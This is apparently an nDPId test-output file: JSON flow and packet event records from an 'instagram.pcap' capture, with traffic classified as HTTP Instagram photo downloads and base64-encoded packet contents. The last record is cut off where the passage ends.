00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7560000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
02377{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1436720900716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900716,"pkt":"QPMIw47hABsv8H60CABFAAW+uH1AADkGTewuIUagwKgAZwBQl6CnSNXfj\/UmaIAQAiku5gAAAQEICprfPdsAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjU3OjA4IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTUwMDMxDQpDYWNoZS1Db250cm9sOiBuby10cmFuc2Zvcm0sIG1heC1hZ2U9MTIwOTYwMA0KRXhwaXJlczogU3VuLCAyNiBKdWwgMjAxNSAxNzowODoyMCBHTVQNCkRhdGU6IFN1biwgMTIgSnVsIDIwMTUgMTc6MDg6MjAgR01UDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDBjMzQ3MDAwMDEzNjQwMDAwNjM4NDAwMDA4MzJiMDEwMDBiODUwMTAwODdkZjAxMDAwZDRhMDIwMDlkYTIwMjAwNzY3MzAzMDAA\/9sAQwAGBgYGBgYLBgYLEAsLCxAVEBAQEBUbFRUVFRUbIBsbGxsbGyAgICAgICAgJycnJycnLS0tLS0zMzMzMzMzMzMz\/9sAQwEICAgNDA0WDAwWNSQeJDU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1\/8IAEQgEDwQPAwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAUBAgMEBgAHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAANnYrv6OWePnpwvl4Ucr5ZqutmsxzGNFZbBKECWI2oX8gp+rqOdscgJarTJrPTiAtUZEnHz0qOljcEskD1c01Rksi2ko7C10FaSJqLDY0bkkglRK+J01IqIm99eIL6jmheWgjCKVJUTsjcmxJXNVG3K1KNr3irtvMCithKVbraoq9cQKb5mse+vydpRzhEXinDIvFyoIspSDsdW4LfVORbSFGS9z0Q07Vapihe24SRFCV8D5p7U4fInJNSacY9CnDoLekTpOusTppdQVRUWk5Z3S6nSOaiisOZWrWqtSjFjqVjcxzA+ktxbdV5FmYfOO1PR5O6tOVN6dGCvruavqOenPG2AT0hWptvhfNzvglTijkaS2WB9FlYElvdXcE7qNkc6sYnO6nwWWwvB6cwHJ3BI+Pk7LqzU7SQPCRiRBzWw1M8o9Wr7h8yd2Yes0RUdMne6nInZbXUcjq0gpefEOw6FZdhsSpo1\/NNSRGRwz8KussbUKdHc9LXYK7JQkHbZE9CMRrLHVuCy6tIhIp+ajbOxDZOaN8kM6b52TRosiOmpWqktXN4fR9WcyxQQ3Mi1m1NxKzxO57gjldCOau1Guh6KocxG0s90jNuePlRqSaiqL7xrhlZBD1ROCogrq0VC86jwXI66CmfUcy84e5MlIKemSZRcnZWo5lqOCIVpafMuyjnIKtHOmrjanNWmV0at9VUdlavIty0UHfcNVBHhvASbQRlyCBWndG1xZlpvVXVpuTtPpPHelHPmiqjZJuxJVci8tKRVa6m0Lsg1QJNocO+lKMV1BqVN+Km1zbjrI1P1ZzUr6iNEZRL5ZRw56q6yDgmfWQLsg16ZNg3hkHi+ETQdInbdS4duCJorHU42r7hqMKoMQCnCeAuojkF0F8BRBzhkEpcFpK6im5sQ5GRJU57qi78tptbhTpBzLHQKE7qrwsdX4LS1+Ts9Uc1YWugWOruCfoFCwtRydla3CsLCo7DIlTl6FQm6BQnWuoT9DwSpCoS9DwTdA4JVrqE\/QKOx0ChM6u5EjoeCVY+ZIiIA="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1436720900717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900717,"pkt":"ABsv8H60QPMIw47hCABFAAA0wXFAAEAGQ4LAqABnLiFGoJegAFCP9SZop0jbaYAQH+o19wAAAQEICgAD63Sa3z3b"}
02375{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1436720900744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900744,"pkt":"QPMIw47hABsv8H60CABFAAW+u1hAADkGUttSVRqiwKgAZwBQ4lApkhzMOpIM7IAQAku18QAAAQEIClYLL1sAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjMyOjE3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTEyMjY4DQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA4OjIwIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AbFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABPHAIoAEpGQk1EMGYwMDA3NWIwMTAwMDBjZDFlMDAwMDUxNmQwMDAwYTY3YjAwMDBkMzhhMDAwMDQ3MTMwMTAwZDU4MDAxMDA4Y2I2MDEwMAD\/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT\/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT\/wgARCAKAAoADASIAAhEBAxEB\/8QAHQAAAAYDAQAAAAAAAAAAAAAAAAECAwUGBAcICf\/EABsBAAIDAQEBAAAAAAAAAAAAAAABAgMEBQYH\/9oADAMBAAIQAxAAAADRJrP1fOIlpAgZgklAaSWREiWQ0hYBBKMG1GQ0mshINSQNKwDZqISVGBpCiEDBAlSiBIUY0GoAhRgEhRMIlm0hLpRTallISS1AgnEASgbEmowbUamIMzBKgaCCgBEs2NLM2INRiSFhiApTEksNJDhobBqHjA10yQHEiSSgCQoARGYJBhCQZgklkCTCgQThDSSzabMzAkuECSUY0gwJJmbEGogIGpiCWaEBSgbNRAk1hiCcJCDUGkGshpCjEkKVJthagbCzEgKMEmYAjNQICzaaWoAhZmxAUYIUZySQsAQcITZqJSxlGVMgDAJCwCUrCEBQYgwoEBQQkzAJBmxKXSBBmbEAGggowSlYBIcQJKloYRrJCQtLEmsASVhiA4kRGYGQUQkk4AQsEwgswbNZNESw2kzUk2awBJdKQg1KQ2ow0ROkNBOpEk1BhBZtEDMASgCCdCMMwuixAcIEBYE2HEjbNYBBOkNAUoSCWTaTCiKSWBthwkkBZAQUGINwDaCjkkhZobDgBCXDE0pYbQThobDiXEicJjalhNIMCSayBCjAEa0ySQ4QJNQYkzMCJYBBrMEEpQIDokIJwkIUoMSToBClAEGtQkEs0YClHRYk1pBIMwbNQYgnSYgLIEBwkICyYhS0tJCxFthwmkKMASVmhAWbEE4TSQsgIGpNBLIRBQaQayBJOAEBwMQFpAkukCQsAg1kwjMMCVgRGahtk4ASFmDYdSCQtbGjUbRJdAkBZDILMTalGxBqU0hLiYmGDXVNCjMaUrANmsIQlZttqUY2w4RFAcShClECQoCSlwmETgBsKNMgZsSTpAgKSIlGYICyESVkBBYBBqJog4E0E4TEB0gQHA00FqGlLhuKTNQINQJJJZgg1KY2ZpImFGNJLDSTWQIWFASXDBBg5BGoAgOEGEajpmg1hCCcIEEswQl5DSTM00EswQFATalGCCUYJJRg2oGCQsxoSswQow0lLgQhSgCDUGkBYEkOEDYdAIJZgk1ESQpQcUhRsSFGCQZgklgEmZg2pZyEBZgglmMiWQkhRgkOBoicSMiWbSDWGJNQBJOAMAKVVMgYiIUahNE4Y2wsNICwNCXUCIlmDRuGk2S1NsLUYIJwRbZrDSAo00GsmINQEkk="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1436720900745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900745,"pkt":"ABsv8H60QPMIw47hCABFAAA00CZAAEAGPJfAqABnUlUaouJQAFA6kgzsKZIiVoAQH3QuLQAAAQEICgAD63dWCy9b"}
02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1436720900872,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900872,"pkt":"QPMIw47hABsv8H60CABFAAW+QeVAADkGzDdSVRq5wKgAZwBQ4m1aOHmGBPBEEYAQAktTqQAAAQEIClnq0tYAA+t6pEVxjNbEsTo05BJiqWC+y9Cm00IuBsqQ3OjXYmls3ooNNijoaA4JvaGXA6WBNFUSNxldWicRkqfSvQ+ysT9n0voZ+EyJR6Oy8JFg5mjiK3jhnpErGpjhG8skeRODdCdQ2MDy8miGRvQk1oSZFhVmGQ28jcag3sVEigomNJgo2R5DYnSdEiIuyPaJg2JvQlTQl7HH2PCFhjS9CYo0RCdlSaY2qVbA7SVlukMk60Nrou0FvVb7YyZLsTJUNNjXYcKjL2NNBHY6YRIqyEsm+g1byhIVtLCoTuULeROaIZSg30H1KXibE4I6MNQaNsuwl6EmkRW2hNPKHVGvY2h4LXCptXgsREUx4KkzYc6itsZrGceuCUwiNvZ0NlpU4bHVgOMeBQT+hXsW4NkxniYRKY0LOGPOuJ3wxvNY30XInTbyUHSrYx3BbGhCWhOLAjiZyQZFUJdjY3cIt4ZOkJvIlCy+hRiRG+RuPBllCy6VrIsIWMN5wEbUZGNRwXYxYMsCZvBM0SI+CRpDbsamyBbROyZoo8CJEl6E9mJ2S8EM3LEKN5FGYSlBs8UdkxmA2mpRC0zPZ7xJ9CwL8H7GJMEIRrTFqwKrYnyiJkSFrOodENU0wTGWNK2jlI9lfZlilokuhJLsxJCYIN4hejdRoOrIspMTJA01hjZUKPFINeESqCUMEQXvhWETJONsmi4g1wbPQfoNvgSpYMGCvY9YNIqvA3SQSmRLI4YPo2XNMYImYP1DY4jPgTTw2RtDTZj2bUhs0VbI6JdDjHkaG0not6KSwmmsQgk2Q2d8EY0NThbnDb6LikplbG2dZcC3WN4yZoyEhYNBej0BWx7I90tpJlyN42ZDbInnJ1C1j9i4ezDdGzUCRBRluhyJbIYWhtD6NOhqmcKFroh5EphFtxoj0LHA27N4EuzbHNiablHlZGpBOsMNmxNFXQsIyISmhtLI00bJ7F+j1S+jDRaWi3vmNnZe2dMzFsHjJciezaGpgnsUwLB9OsnZ3niE9jVXaWBDK2XAvaENk6N0ekQ2O9mkVid2JeCeikitCaY2qSMSexWxPhK4FBtCR+iXk7ssgLA2L0SCdTorMmVWF2XC0NTE0Jx1GuCltCJQTg1LLSyaM2UJLoSF6DFF9Mw9kaL7IKmI4MmxmzPiZWtisp9MNxiCdRNs2PYXFI7EHTI1SpITxUMwngXpkyZLmoTeRzsWCnZ+DfRVtifokzCxuYoykLQuIaLckmHw90WsHeOLnJ84eDeStIr0XApBloXsSFOuGxPJSo9D4JV5INNsaqEnFWmLKwNNiDhZETR+8N0hPQnDfQ9jUeRJC3L2abSUYrSyXKQvTLUJ0TMDXTG22NpLA+h7pbgbPbEFhURZQjQj9GNi+DZGcFGLsjYTTQlYRp28M2yQyxotDecoU0R2IEl2iJYG4illoT0E0yNMauOGKUSPA0mRrZpNHQ9mUtCe8LiDqwZ6FGTD0YCawPKG6VPR1B6om0oVtJszsT2oPLg1iChibE3sd6Emqj9QlcmEXhv0J3fFLW0UaJbG7obENhs2LInSGhYWLA09oR2MwU2WaOiiYyFETeCZiGhtrYmeGRtwUYEs5HJsYE8FFhHQyA82YMmWhvJ+luERPJpCaXRrgavgriCd7HBcZJXUMHg9aNwpE0U5guCZyNlQ8sSjo1kSMsTUUFRQbOhYwhtnKP6SOXI1R12JOnuIeq2VMpZgm+hdg0iYglGUXsWqM1gbLTRccdQh6Ku0exnodIIyzBObLeyzRbgl2MPIvcF+DTaqR8HaG7s1kuabRjJ0TpPR2VPJV7KLKyJPRF0V2DRrKEZhaNsjpZo9uNoKHwaJdi0JwbUojVhqtMTJ4I0NdDcP0bBkIaxSOjsCQm08MyRGoPKyP2uPoVQ="}
02372{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1436720900873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900873,"pkt":"QPMIw47hABsv8H60CABFAAW+QeZAADkGzDZSVRq5wKgAZwBQ4m1aOH8QBPBEEYAQAktstgAAAQEIClnq0tgAA+t6yOoxEtjJYMe0j6G03geIuahaK1oTHsEliMMTZ8IV3w+jNLnJcKpRQYoNH0Q1owU7ElIg1BvY00M1sKh00GrYYaKmxapIfSuhKlliV5Ggz2ZEdUXqEuURYhcRmGdF6HkVYKkoGKmh3bGvRvDFLCRD9sysMedkSiftieCrscIysGDeGZuR52JNFJwy1gdIqmuE8SC43k2NNmXvnK0LZ7Q9kdYKlspkg9CZoqhXWJtbKpgafXBrJWhOsqdlcjGlMIf02UEyYUEoN\/R3BPJjY2bCG2s0iEvRRNQ+jO4xqKDwyI0ohahosjThi9BIrI7gehuDWUCCJLBXotaGI3Qlg0wJ4IVBKoTow2PA\/UqeR2ILqdQ62OGMraO4hekPhuNoceBSE3cCJmskaK+hP2IZK1kxs+D0NwaUQbYMYurNlQeMoTLYsrBUslTyTGB4bJjIpUh1Csyxlol2o3gucCaI7VzLkaJHRLOOI9DqwQy9GXvictCZRvBROF7M75lwMNqMbA1Q7yIm8GJWsFybGm8jbOi8hKnkr2M2jAtIEustYo61E\/YmmP6L0b3whJbGvRDYcGUzATfFIDVQIw2Oobux01kTo0N6FINdmGBYdKOUophoRJtodkbFVo9gsdiVGqholRuBaWjGKEmDKSSFXnjQZrsSagmHGQ2V6YSOqJlWjZkzB3BjS9mOWLBMSDwqGspicFTSY2vRnKTsOEJT6izJU3UzZMYLFNbFHhcKrhEElmjUHgsGw3eFliqL7LktKtGhuCzshGkdcMxokwNDSEy0x5WRazwkNsaY8bLNjG6JXCGsDRGmNiieYQKFSLNMh9GJBBqDcYmQ\/TLYs4Y5okeCCq6KrROsWRPA\/QgqexNDwJeyORUtLVhijncHacZgTImKglDuKPKPiNMVuBBPFGsVisByZlsa7HsdRZxjrKIyEiLkwMS2JuxPlJTJB8H6bZlkrSN1n4byX0J4EzWxRB5yNNiRbIpUIU6KJCXaHjR8G5KJ9CS9nWBuYG8YG6i9HshCfoTL7I9i9svs2S0igzvAmIqQvhrDHLkQf6KrgpKCatLEWjeRJbOsDeINKDg0ui5F0zaibWWN0bpi9BWZoEHKMpILVMCwVlji1gwwlSnhCVWC+iHqDPofxpWqTM0eNJ2xqh8YRjmCGxosC24xO6HlDsYiabHsVY3Q2j8FwXDnhHTop2I0ZBKKmqh+g1MksMLJUzHQ4tCWBioqFxpAlEhOSDo8Dagmn2S4NI9pDj9P0qphlFmxt9ob7Q4fDeWdIS9mSomrgesCHk9xVyISbeBYZYqOnkRY6Qi+xNoTGi3wtcJ8IdEGuiiJs+CUCzHWBIwyehKjUWCjSYQ2xehJQkV4bmCDSE3ajpBI9MbbKsnYhMqSE6SoSmxVZQz7F7Cxw52a0Oi4wa6G80SyNISCZNs1kTWjAjbEjBSIX0JgVNEej4YLk6FUNkLSpOMieS4G8EdEeg2KpGUxUsEchDaYw1FYKjISLZtH5xdj6MjnZrR0KQaPJCYqtCpZNBN3Ym8GJNCRoeRqPAyVRi2Jvp8EoJ4hRsvRtEZTjFNsRZ6Lg1GM+iyL6KpBqRssXcg5w2Ui1l6HGqjFFnaPpYhNtEfI6Fk9p+jWy+h1jWBucKo6btHQ1cIbLY6jKwI1kTtCe6OF7GyQ+luTvB+OCeRZE8Cjzw\/QQ2lsbbGNL0REErSTiKuDRksFTw2JZIJTbY1oaZGzXwTzsbdEiLmog0Ji7YqmN+hroiag0PQeUVDI9mcQw6G101ZROVMQtGQ7eH6WaIbNDwsDsK10NpNDbcMrspisEOJISYYqTRU0RDqgVWGQxaXIsvmpFmWPDA8JDDqHRSQsC9DYnnBYhpbF9KmJvaYk7Ktm8jfrhZcJnL5r4twNjbk="}
00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720900692,"flow_last_seen":1436720900873,"flow_idle_time":7560000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":1031,"midstream":1,"thread_ts_msec":1436720900873,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
02391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1436720900875,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900875,"pkt":"QPMIw47hABsv8H60CABFAAW+G2lAADkG8rJSVRq6wKgAZwBQrVt8zLRbo9aCTYAQAxSDewAAAQEIClRjBa0AA+t+qDhdSVH1chUH1JtbCJY\/b9U\/35z\/AIcB2iAbyHujCEFNZ+I0eU8EOIX\/AEB\/qRwVo9Wlp5znKiVYRroroyxNdVdiE6kdYXRMS3KcwBs+EyuWZYuo52fCGCiRaGhDCm0eStltza5zDLVQe2oxt2qbSrdR5pHTZPJaAK7JTxSrekwfflKFROdJwg5Y1CyNVSaHSVxDS0CVTMOVI9v3UgC122i67XHxCfXa5p2RquKuPMJ1XpUxG6NIvp3blVKRpiVRMtCZ59+YOFU7DcnU6dTOhRpECHZCLSwomfujLIK9xojog5ZGQgQ5VGxza\/YotDtEQRr+RTZe72UhDK0U\/Sg+fuESn9pT0VTtKEFOlWOQYBlU6VNyNOjonUmH0p7LdOTSD6k6C1Oj5p\/wckoMOHKYPO3tlU9WFVKbrygB07fGU4txhOccQn+qSgN0CjqgJbEqm5ow5FksvA7VeZ7f3Tajd904VNW6JjQ5ncntFPTPhDtGVPjVZB91ncoRE8oIyp5N9S4cEODlVJp1JmA5fEBxtqYKqUOqP+\/zSg5U2tcI3K4r1W6whjKbVcNE4l2TyDtij7fIFHV4f3CoGWKuyWKj6ICHjmTYVF4grovG6HUCdTvzon0H6hVh+C1MMIt8ICE07KNwg+cFOZuEeTXFquDtU5vj5onCADRCuEIOGmi9bcI9qe6Hh\/lSnr\/LyBA0QtO6w38TUIwWwCvsgy3VFt7sqxzT7KwyZTqc5blYj3X06flx+dK1UrEqM45DARcbWwqkkymmJC+hEywLVAnRSFLZ0Uh2F02s75QrdN3lqFtZuO1OGwcuGqOAgqpFMWFAx6lcXdgGuiNNzYCtMzGE+FGJWdEJR5BUG9p91xTbqM+Ewy22pp5VKoaLu4\/b5BzCouE52V4uc5eoyu2IHzQgtMrhTPaqXY51NHLYVLteWrXnUbcEx1pUhytVgUIjzlVKH10\/2UhqqcmlOQfGqIDtF7I45NMpzflptJyiG\/dbyiJTaj6ZTiKrbmo5ZHhMMtRKf5RzypychE\/TsrBP6osiBO6jfYoVBq4Jz6ZGNEfUA7KqOaIsRYcFuUx8DCcaZ9QXSpu0cjw7\/pyoI1\/xGLV7rflJtjkMIOwg4rTVSeRlD3WuyIIAXoy5qI\/DENgr4jNzxlPqdUrUhEuZmFfdl26N8xOAjGpXr9KDMp\/b2cg5m4lf8u76E2rRtxKi+mQqYlpb4VNj\/S8YREfJPzBEfKCVMohcObXqr2Vg\/wAoZTxbXnyhp8j25QMIOKL0AdeU2PhcRSg3t3TXfS5FiaY1TvI5B0JrhqnsZU7giFog4OwU4cxkwtBCPLZaoE0nIgeoaJuJatkdORVDu7Toi3xGE7KLogHZdS37K7Ca7OUXI936Koe0CUDyCBTg2qId+6LS11rvzZ\/KZqoJ5brPLTlEqFoVKuOCobMhCqWm1Q6YKtduV+OT5hOoPnKDcL0EYwpFTRQ3Mp0GIELLsnZXv0CudC115sBLwAumQ2Vw7vxLTo5VPwqxxKbWp7ynCfyJwpUrqNIh3yxATdVsqUmqFUZ1GLh3EiDsq7e27wm6IhBQnBQoTGSZPIhVh23eFh7IKLc2ldzcFEbpr9kfPNr\/ACqudEeV550hHepk45Bao6qoMSqTx6XJ4teObhypm39E24i9wQd3SVUI2TsnKnZXYgrJ0TO3ITjPIK5XJpVRvVb77f4WZ5M9QUG4hbcsrbkFK+3INkwoA7TsrTspB9WEa3bnXyu5xl6p1XUk6qXbo5gxgJ\/cwRsi0jVNBQLtxhXSSSnFzk4QMr6UQYley4MfidR2jVVqGpk4b48oVXdZrzsuNbkOCHDuPc7tHvycN\/ywOYTlupwuHbm9bJ3Y8P8AKIuCpnCBwsSgii1WocyEzwuKp4s="}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1436720900876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1436720900876,"pkt":"ABsv8H60QPMIw47hCABFAABQv9ZAAEAGTLPAqABnUlUauq1bAFCj1oJNfMxlZ\/AQEUsuYQAAAQEICgAD64RUYwVLAQEFGnzMtFt8zLnlfMypR3zMrtF8zJKnfMyYMQ=="}
00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720900690,"flow_last_seen":1436720900876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":773,"midstream":1,"thread_ts_msec":1436720900876,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901182,"flow_last_seen":1436720901182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720901182,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1436720901182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/BAAEAGs3DAqABnTUMdEYS4AFDrYaSj8+woZ4AQH+origAAAQEICgAD66NkobAz"}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1436720901182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/FAAEAGs2\/AqABnTUMdEYS4AFDrYaSj8+wze4AQH+origAAAQEICgAD66NkobA0"}
02385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1436720901183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720901183,"pkt":"QPMIw47hABsv8H60CABFAAW+nH9AADkGdFdNQx0RwKgAZwBQhLjz7DN762Gko4AQAq9DyQAAAQEICmShsDQAA+ufWEdJBRPnaSmosKHYDmQEyGHV3GAwTrGe5kQxyGEYyxmyELBrJc+SMi3dmmwq1mAYjd9asgZG6SWIbmuecSeibLvJUKPOw0JlNLd+SsFoR4AyWWZMuWzjy22t8lg9nL1yby0j7G5yGHP2UfvrthqhUQLZPhRPRii5ZImLbbxtBh75Nwi10QstpiiOURwgsk\/gse0fhODW3xEaIlCTuwGMxEsajO6KBwgVZE4oD8EZJ8CUI+IftidbAnEAzCB+CxiXeSUkT7I4PLvoy1NnMNCUuGI63ybZNQBpkMtmgmFlmfthxhK9DguCw4XPNprshLbUVoAbHdBaG0WibQPaUDoawN0QnEMFu5OOsEXu+c3ydgozRy0R9FbV0F8hsoSyHLIicGyGMakQqAYSTks8J\/2+\/kORfizOWuAtMcMCSaUPfEY6f\/ttodWXWPLX7bzs5o8i2FH5IZ4wLEpEOhwV2MADYJIWDBmF9CQdn6hh1kzmvWM7b4SuFg+iI0QmrTgRgMl\/rAMZDtwdyKQyk+DPksJTgtrhZZRA\/GY+X2oyKfiboDY0NouOzUthrGCw4ToWxqMKM+rf1sDDAEsjSzJB7rCfcDOwibANVH23SwWhh5rFCY04ksXdhurOKpIBQXzCwN2yHF8S1j2hc2z0kMsCW+OeS+e5HaaRoyzZaCzPNrgnwkhY7i8yZQkeMkH4woSzgHZw7AMoJTs5nD21BiRDuFCBqB4lGX+kk55UTfE62aMJ9jBPBhqltnyYDTEarQKEsWGbVjV7cRHRc\/J